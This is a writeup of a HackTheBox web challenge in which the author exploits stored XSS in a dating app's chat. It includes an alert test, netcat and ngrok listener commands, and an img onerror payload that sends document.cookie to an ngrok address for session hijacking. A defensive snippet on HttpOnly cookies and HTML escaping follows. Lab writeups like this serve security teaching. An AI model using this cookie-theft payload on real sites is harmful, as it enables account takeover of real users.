(Writeup) HackTheBox Labs - Challenge - OnlyHacks

Welcome! (Happy Valentine’s Day!)

  • HackTheBox is an offensive cybersecurity-focused platform.
  • This is a writeup for one of their challenges.

Scenario:

Dating and matching can be exciting especially during Valentine’s, but it’s important to stay vigilant for impostors. Can you help identify possible frauds?

Release Date: Feb 14th, 2025.


Start:

This challenge has no files; looks like it’s only an IP and Port given to us.

The challenge is very easy, and the description and name point to a web app. Just gonna check it out in the browser.

Pfttttt- okay. Well, the login doesn’t do anything with dummy information. Let’s register.

Register page:

Guess I’ll register a profile to see what I see.

Looking around, there is this dashboard page and a chat page.

Oh, should check out cookies as well.

No HttpOnly flag on the cookie? Oh, is that the target? XSS, get session cookie, get flag?

XSS

I “swiped right” on everyone on the main page and got a message. Testing:

hello!<script>alert(1);</script>

Yep, XSS. Now let’s grab their cookie… (if there is one…)

Shout out to HackTricks.

Real quick, since this is a challenge box, we need a publicly accessible IP:port to get the data…

Time to spin up ngrok.

Now we’ll set up 2 terminals. One to listen, and the second to run ngrok.

nc -lvnp 4444
ngrok http 4444

Now, let’s alter that script and send it over. We’ll just paste the forwarding address from ngrok into the XSS script. In my case:

Sorry. <img src=x onerror=this.src="http://e4c1-85-9-195-5.ngrok-free.app/?c="+document.cookie>

It worked! (Also caused a ton of connections over and over… so I CTRL-C’d ngrok.) Let’s alter our session key and see what we get.

(Remember to click save if using the same Firefox extension!)
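
The two weaknesses this challenge relies on (a session cookie without HttpOnly, and chat messages rendered as HTML) each have a direct fix. The sketch below is an added example, not code from the challenge or the original writeup: it audits a Set-Cookie header for missing attributes and encodes a chat message before rendering. The function names, the cookie name and value, and the markup are constructed for illustration.

```javascript
// Added defensive example; names and sample values are constructed.

// Parse one Set-Cookie header value and report the attributes whose absence
// lets script read the cookie or lets it travel over plain HTTP / cross-site.
function auditSetCookie(header) {
  const [pair, ...attrs] = header.split(";").map((s) => s.trim());
  const name = pair.split("=")[0];
  const present = new Set(attrs.map((a) => a.split("=")[0].toLowerCase()));
  const missing = ["httponly", "secure", "samesite"].filter((a) => !present.has(a));
  return { name, missing };
}

// Encode the five HTML-significant characters so a chat message is rendered
// as text in element content and in quoted attribute values.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Render a chat message safely: encode first, then place it in markup.
function renderChatMessage(sender, body) {
  return `<div class="msg"><b>${escapeHtml(sender)}</b>: ${escapeHtml(body)}</div>`;
}

// Constructed samples: a session cookie like the one observed (no HttpOnly)
// and the hardened form a server should send instead.
const weakCookie = "session=abc123; Path=/";
const hardCookie = "session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax";

// The test message from the writeup, used here as input to the encoder.
const probe = "hello!<script>alert(1);</script>";

console.log(auditSetCookie(weakCookie)); // lists all three attributes as missing
console.log(auditSetCookie(hardCookie)); // nothing missing
console.log(renderChatMessage("me", probe)); // markup shown as inert text
```

HttpOnly alone only keeps document.cookie from exposing the session; the output encoding is what stops the injected markup from running at all.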

Hope that helps! :)

Author: Reed Eggleston
B.S. in Cybersecurity | SSCP | CySA+ | PenTest+ | Project+